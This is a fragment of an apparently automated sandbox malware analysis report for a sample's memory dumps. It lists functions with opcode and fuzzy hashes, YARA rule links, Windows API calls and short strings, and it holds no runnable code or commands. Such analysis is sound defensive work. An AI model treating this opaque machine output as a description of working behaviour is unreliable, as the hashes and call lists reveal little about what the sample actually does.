Opcode ID: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction ID: bfd1fcac08202211aa41bf5968099014137a132fd173030addfaaee6c8577754
Opcode Fuzzy Hash: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction Fuzzy Hash: 4741003110C3429BC718CE25E94442FBBE1FBD5B48F204A1EF4DA66260D3748E49DB97

Uniqueness

Uniqueness Score: -1.00%

Function 00CB0687, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Jd}, xrefs: 00CB069B

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: Jd}
API String ID: 0-2909368870
Opcode ID: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction ID: 1005f4861886290cf24394ed5ff468d39bfa100a0c981bc6c5198c4a8cf12ff4
Opcode Fuzzy Hash: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction Fuzzy Hash: 314188716083428FC718DF25C845A5BBBE1FBC4348F644A2CF896A6221D774EA49CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00C93F5C, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

[ , xrefs: 00C93FC0

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: [
API String ID: 0-603502248
Opcode ID: 27cbefbce515dd8bc70399823a0d799d1188f19287186614176daeb31b516365
Instruction ID: 9355f476a68aa4cc886fca024dc436aaa6bf48a849d20ce1254598cf81eb90ff
Opcode Fuzzy Hash: 27cbefbce515dd8bc70399823a0d799d1188f19287186614176daeb31b516365
Instruction Fuzzy Hash: C541ABB26093119FC714CF29C88995BF7E0FF88718F401A2EF98997250D774D908CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1193, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

Zc, xrefs: 00CB11BD

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: Zc
API String ID: 0-1893601696
Opcode ID: ddc4cf8e54cd610d441d97f82893cdf7a8c09548f8173e6c7a23e64ad715387b
Instruction ID: 94701cd5813458319ef0a122c71add7bacb30ce9f48eade59e1c1a3c39d08967
Opcode Fuzzy Hash: ddc4cf8e54cd610d441d97f82893cdf7a8c09548f8173e6c7a23e64ad715387b
Instruction Fuzzy Hash: 3131F2B15083428F8718CE65995A45FBBE4FB88748F404E1EF5A6A6210D3B4DA0D8F97

Uniqueness

Uniqueness Score: -1.00%

Function 00CABEC9, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

~O_, xrefs: 00CABF6D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ~O_
API String ID: 0-756777959
Opcode ID: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction ID: 671e5989ffb1bc9c73149650805a98a029a6310b98589d92e3f8a9ad3e10293a
Opcode Fuzzy Hash: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction Fuzzy Hash: A5311371D00209EFCF58DFA5C98A5EEBBB1FB44318F208099E515B7220C3B46A54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4D8D, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

^@, xrefs: 00CA4DFF

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ^@
API String ID: 0-322773941
Opcode ID: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction ID: 4087daf37c1223f473cc67dceaf1f9de0054cdf979b40375b543d2b48a232330
Opcode Fuzzy Hash: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction Fuzzy Hash: 8D31D3B1D00209BBCF15CF95C84A8DEBBB5FB89704F108189F914A6150D3B59A65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C92309, Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

SV, xrefs: 00C9233B

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: SV
API String ID: 0-4155469514
Opcode ID: d537c483be67e7e9542d60fd5e56f998a3dbb210f6eed5e1b8177d3440014ee9
Instruction ID: 28d5bcfe612ed525754673f41a5a17e53c918b41a3244315748afee9ebb5ab9f
Opcode Fuzzy Hash: d537c483be67e7e9542d60fd5e56f998a3dbb210f6eed5e1b8177d3440014ee9
Instruction Fuzzy Hash: 73311FB0D0121AEBCF44CFE5D94A5EEBBB4FB00304F10818AE521A7260D7B5AB52CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6F182A80, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID:
API String ID: 3709121408-0
Opcode ID: 1e31b8884a83a4e18d8675ab363e6b8ae1dd794346c60a0da8292e9facac7902
Instruction ID: 42db6a530b1eb93c6e7df03790aa0ca10dfc71d799ec9c3bbf7daf78cf362042
Opcode Fuzzy Hash: 1e31b8884a83a4e18d8675ab363e6b8ae1dd794346c60a0da8292e9facac7902
Instruction Fuzzy Hash: 3CE1A172D00258ABDF15CFA8DD50AAEBBB9FF59350F14412EF825A7280D734A521CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F19DC5D, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc41b30e7e5b86dc66101635f69ac0c26b3a08b76a8c34eb2c10dd699fdd9d9
Instruction ID: a61c3987d34b293d6cd0c9bc4a67ad4d912787e1f58d2ed98c68fc118256ef65
Opcode Fuzzy Hash: 9bc41b30e7e5b86dc66101635f69ac0c26b3a08b76a8c34eb2c10dd699fdd9d9
Instruction Fuzzy Hash: 45613771A4070966DA148A388990BEE33E7EF627C4F001A1ED9D2DF2C0D655FA72C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD6A7, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b8a7c2d5db39821bd63ead1cbe851df9325711b2a755ab379f98dd341f4199
Instruction ID: 3287e839590318600dfa0cc4e1c5d938cdc19599f3999fc8ef5754e17d1ff952
Opcode Fuzzy Hash: b8b8a7c2d5db39821bd63ead1cbe851df9325711b2a755ab379f98dd341f4199
Instruction Fuzzy Hash: 825136725083418FD348DF26D48940BBBE0BBD8768F144A1DF4DAA6261D7B4CA4A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FD91, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction ID: b79b628892b17ceb167f76406d7f9e827a065630326991afbb97e8ea12c76368
Opcode Fuzzy Hash: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction Fuzzy Hash: 2F31BF715083018BC314DF29C48941FFBE5EBC8768F048A6DF4E9A7261C774DA4ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 6F188A50, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction ID: f6362cf0e5906cc59235f36a864cc3f91a8e5cb3aac358b1c0829bfdb44376df
Opcode Fuzzy Hash: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction Fuzzy Hash: DA21A476B052148FDB10CF18D9C0AA5BBF4FF5A320B1A01EADD59CB352D231E864CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9251C, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction ID: 65c3f6e782c5982f9bb4df85cd99742169a2000cb4bcca3c620096b98167ea58
Opcode Fuzzy Hash: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction Fuzzy Hash: 283133B1908342ABD354CF66D55801BFBE0FBC9718F108D5DF4E8A6210D3B8CA498F86

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7BB2, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction ID: 919f6ebad5f773d7b4c0826fcfb68d4dd36632891a673fef357deb7ba85e6589
Opcode Fuzzy Hash: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction Fuzzy Hash: B7213475D01208FBEB48DFA5D84A8AEBBB2EB40340F148199E525AB280D7B55B15DF80

Uniqueness

Uniqueness Score: -1.00%

Function 6F186510, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction ID: d7541461b44cf89811970398606c299f271dbe3ce0bc42498712d6f5e22bc105
Opcode Fuzzy Hash: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction Fuzzy Hash: BAE0E6366266648FDF55CB08F640A9573A0EF52FD0F4608AAE825CFB19C360FD518D90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1813F0, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction ID: 513b67be4edd1d986e0762750fbffddf320f0749b097b682cc1280866c81d57a
Opcode Fuzzy Hash: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00CADE10, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6F189BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F189CDA
VariantCopy.OLEAUT32(?,?), ref: 6F189CE8
SysFreeString.OLEAUT32(00000000), ref: 6F189D30
SysFreeString.OLEAUT32(-00000001), ref: 6F189DC2
VariantClear.OLEAUT32(?), ref: 6F189DF7
SysFreeString.OLEAUT32(-00000001), ref: 6F189E16
SysFreeString.OLEAUT32(00000000), ref: 6F189E47
SysFreeString.OLEAUT32(00000000), ref: 6F189E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F189EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F189EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F189F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F189F28
SysFreeString.OLEAUT32(00000000), ref: 6F189F37
SysFreeString.OLEAUT32(00000000), ref: 6F189FBB
SysFreeString.OLEAUT32(00000000), ref: 6F189FFF
_com_issue_error.COMSUPP ref: 6F18A041
_com_issue_error.COMSUPP ref: 6F18A04B
_com_issue_error.COMSUPP ref: 6F18A051
_com_issue_error.COMSUPP ref: 6F18A05B
SysFreeString.OLEAUT32(75C6D5B0), ref: 6F18A061

Strings

lines, xrefs: 6F189EDB, 6F189F02
offsetY, xrefs: 6F189CF6
!, xrefs: 6F18A00A

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: f7534e8b5d3ca19121d4bdec1cef7dcfc236ed808c0ec82b690f2fe8726bfcda
Instruction ID: b425101c52c97dde8d1189581edd14ec04344e651b0a7abb46857e1eef897318
Opcode Fuzzy Hash: f7534e8b5d3ca19121d4bdec1cef7dcfc236ed808c0ec82b690f2fe8726bfcda
Instruction Fuzzy Hash: 2FF19170A0020ADFEB10CFA4CA54BDEBBB8AF15B94F104159E425BB284D735E915CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1891C0, Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 343COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6F189296
VariantInit.OLEAUT32(?), ref: 6F1892ED
VariantCopy.OLEAUT32(?,?), ref: 6F1892FB
_com_issue_error.COMSUPP ref: 6F189563
_com_issue_error.COMSUPP ref: 6F18956D
_com_issue_error.COMSUPP ref: 6F189577
_com_issue_error.COMSUPP ref: 6F18957D
_com_issue_error.COMSUPP ref: 6F189587
_com_issue_error.COMSUPP ref: 6F189591

Strings

name, xrefs: 6F189248
counter, xrefs: 6F18963B, 6F189666
value, xrefs: 6F1893D0
page, xrefs: 6F1899EB, 6F189A16

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$Variant$CopyFreeInitString
String ID: counter$name$page$value
API String ID: 2858117124-1733285648
Opcode ID: 45b7cd801d8b7108d726c999d77fb1aa404ef6e7920646a8aeb8a60243a6ced6
Instruction ID: d297980f55bfa0de8e73b474a9be447b9ab068d6147a823fd95ea257646433d5
Opcode Fuzzy Hash: 45b7cd801d8b7108d726c999d77fb1aa404ef6e7920646a8aeb8a60243a6ced6
Instruction Fuzzy Hash: 68C1C370A01605DBEB10CFA4CA64BDFB7B8AF21B54F54415DE825AB284DB34F914CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1923F0, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6F1924A3
GetParent.USER32(?), ref: 6F1924AC
GetClientRect.USER32 ref: 6F1924C2
CreateCompatibleDC.GDI32(?), ref: 6F1924C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F1924EA
SelectObject.GDI32(00000000,00000000), ref: 6F1924F6
SelectObject.GDI32(00000000,?), ref: 6F192508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F192521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F19252F
SetBkMode.GDI32(?,00000001), ref: 6F192538
SetTextColor.GDI32(?,00FFFFFF), ref: 6F192544
GetClientRect.USER32 ref: 6F192556
ClientToScreen.USER32(?,?), ref: 6F192564
ClientToScreen.USER32(?,?), ref: 6F192579
ClientToScreen.USER32(?,?), ref: 6F19259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F1925FD
SelectObject.GDI32(?,?), ref: 6F192608
SelectObject.GDI32(?,?), ref: 6F192613
DeleteObject.GDI32(?), ref: 6F19261D
DeleteDC.GDI32(?), ref: 6F192624
EndPaint.USER32(?,?), ref: 6F192632

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 5e69e816b3f48245762dd5d5f917af15bb5d0302a6be6f51dbb4cc053f581ac5
Instruction ID: 8f3fed75d52a98d0a5be8ceecdb42dc3e2035541538178c712b01a0104495907
Opcode Fuzzy Hash: 5e69e816b3f48245762dd5d5f917af15bb5d0302a6be6f51dbb4cc053f581ac5
Instruction Fuzzy Hash: 6B614C71104B01EFDB20DF64C948B6FBBF8FF89350F004A1DF6A5926A0DB75A9158B92

Uniqueness

Uniqueness Score: -1.00%

Function 6F192460, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6F1924A3
GetParent.USER32(?), ref: 6F1924AC
GetClientRect.USER32 ref: 6F1924C2
CreateCompatibleDC.GDI32(?), ref: 6F1924C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F1924EA
SelectObject.GDI32(00000000,00000000), ref: 6F1924F6
SelectObject.GDI32(00000000,?), ref: 6F192508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F192521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F19252F
SetBkMode.GDI32(?,00000001), ref: 6F192538
SetTextColor.GDI32(?,00FFFFFF), ref: 6F192544
GetClientRect.USER32 ref: 6F192556
ClientToScreen.USER32(?,?), ref: 6F192564
ClientToScreen.USER32(?,?), ref: 6F192579
ClientToScreen.USER32(?,?), ref: 6F19259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F1925FD
SelectObject.GDI32(?,?), ref: 6F192608
SelectObject.GDI32(?,?), ref: 6F192613
DeleteObject.GDI32(?), ref: 6F19261D
DeleteDC.GDI32(?), ref: 6F192624
EndPaint.USER32(?,?), ref: 6F192632

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 89841314471f4757b836b04edbf9f93e92d1f8cf6b750b53664c2b78ff70c01a
Instruction ID: cc768d28aa7771ede610e81a38c85cdda4e73d824dcb80b267c41b00731ba911
Opcode Fuzzy Hash: 89841314471f4757b836b04edbf9f93e92d1f8cf6b750b53664c2b78ff70c01a
Instruction Fuzzy Hash: 85512671009701EFDB20DF65C848A6FBBF8FF89350F00491DF6A5922A0DB71A825CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A7B6C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1A7BDC
_free.LIBCMT ref: 6F1A7BF2
_free.LIBCMT ref: 6F1A7C03
_free.LIBCMT ref: 6F1A7C14
_free.LIBCMT ref: 6F1A7C2B
GetCPInfo.KERNEL32(?,?), ref: 6F1A7C73

Part of subcall function 6F1AF178: _free.LIBCMT ref: 6F1AF1E3

_free.LIBCMT ref: 6F1A7E1F
_free.LIBCMT ref: 6F1A7E32
_free.LIBCMT ref: 6F1A7E40
_free.LIBCMT ref: 6F1A7E4B
_free.LIBCMT ref: 6F1A7E8D
_free.LIBCMT ref: 6F1A7E95
_free.LIBCMT ref: 6F1A7E9D
_free.LIBCMT ref: 6F1A7EA5
_free.LIBCMT ref: 6F1A7EB3

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c3ad110ef0bc19de26d35282a6b4c910e39dc4e91e77e6127c3224157ca0f2db
Instruction ID: 5d1d4084fa711c9ace2d7fb41bb4c1ddaa4c1274da1d0abf310714fd7c6f705a
Opcode Fuzzy Hash: c3ad110ef0bc19de26d35282a6b4c910e39dc4e91e77e6127c3224157ca0f2db
Instruction Fuzzy Hash: D8B1B1759003099FDB11CF74C880BEEBBF4FF18344F10416AE469AB285D777A9619B60

Uniqueness

Uniqueness Score: -1.00%

Function 6F18A080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,B5D78B91,75C6D5B0,00000000), ref: 6F18A124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F18A132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,B5D78B91,75C6D5B0,00000000), ref: 6F18A14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F18A170
SysFreeString.OLEAUT32(00000000), ref: 6F18A17F
SysFreeString.OLEAUT32(00000000), ref: 6F18A306
SysFreeString.OLEAUT32(00000000), ref: 6F18A358
_com_issue_error.COMSUPP ref: 6F18A366
SysFreeString.OLEAUT32(75C6D5B0), ref: 6F18A36C

Strings

line, xrefs: 6F18A11B, 6F18A146
8, xrefs: 6F18A22F
Arial, xrefs: 6F18A195

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: 73fc7f34e93e4fffa16dfa6ff57c0d2ca2bcd9889bd568be1e94f788241aed9c
Instruction ID: 3db1dc8715e368d0fa8a4a805fe486fc0129c41e60a80ca1e49a469f82f226d6
Opcode Fuzzy Hash: 73fc7f34e93e4fffa16dfa6ff57c0d2ca2bcd9889bd568be1e94f788241aed9c
Instruction Fuzzy Hash: 9CA1E330900349EFDB10CFA4C948BEEBBB5AF55354F20415DE925AB2C0DB75AA55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6F1B2CE8

Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B44DB
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B44ED
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B44FF
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4511
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4523
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4535
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4547
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4559
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B456B
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B457D
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B458F
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B45A1
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B45B3

_free.LIBCMT ref: 6F1B2CDD

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1B2CFF
_free.LIBCMT ref: 6F1B2D14
_free.LIBCMT ref: 6F1B2D1F
_free.LIBCMT ref: 6F1B2D41
_free.LIBCMT ref: 6F1B2D54
_free.LIBCMT ref: 6F1B2D62
_free.LIBCMT ref: 6F1B2D6D
_free.LIBCMT ref: 6F1B2DA5
_free.LIBCMT ref: 6F1B2DAC
_free.LIBCMT ref: 6F1B2DC9
_free.LIBCMT ref: 6F1B2DE1

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 226b51d3a685a37738691e0f47c7c415e21544900bcc10516a4b3994cc710461
